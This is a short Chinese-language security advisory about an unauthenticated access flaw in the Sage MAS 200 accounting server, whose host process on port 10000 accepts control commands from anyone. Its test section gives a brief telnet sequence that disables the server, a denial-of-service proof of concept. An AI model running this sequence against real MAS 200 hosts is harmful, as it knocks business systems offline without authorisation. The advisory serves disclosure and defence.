MAS 200帐号服务器未授权访问漏洞

　　受影响系统：

　　Sage Software MAS 200

　　描述：

　　Sage Software 的MAS 200 是一个帐号服务器平台，它可以被配置程允许通过TCP/IP

　　远程访问服务器端的数据。一个主机应用程序监听到服务器的链接，所有的客户端都

　　使用一个工作站应用程序与主机通信。

　　由于主机应用程序缺乏对访问者的权限控制，任何用户都可以直接连上其监听端口，执

　　行控制命令，例如禁止提供服务。

　　这可能造成拒绝服务攻击或者攻击者控制MAS 200服务器。

　　<*来源：Administrator (Administrator@jfdi.com) *>

　　测试方法：

　　警 告

　　以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负!

　　Administrator (Administrator@jfdi.com)提供了如下测试代码：

　　telnet x.x.x.x port: 10000

　　Connected...

　　"The host does not support this application"

　　 X 10

　　"The host has been disabled"...

　　exit

　　telnet x.x.x.x port: 10000

　　Connected...

　　"The host has been disabled"...

　　建议：

　　厂商补丁：

　　目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商

　　的主页以获取最新版本：

　　http://www.us.sage.com/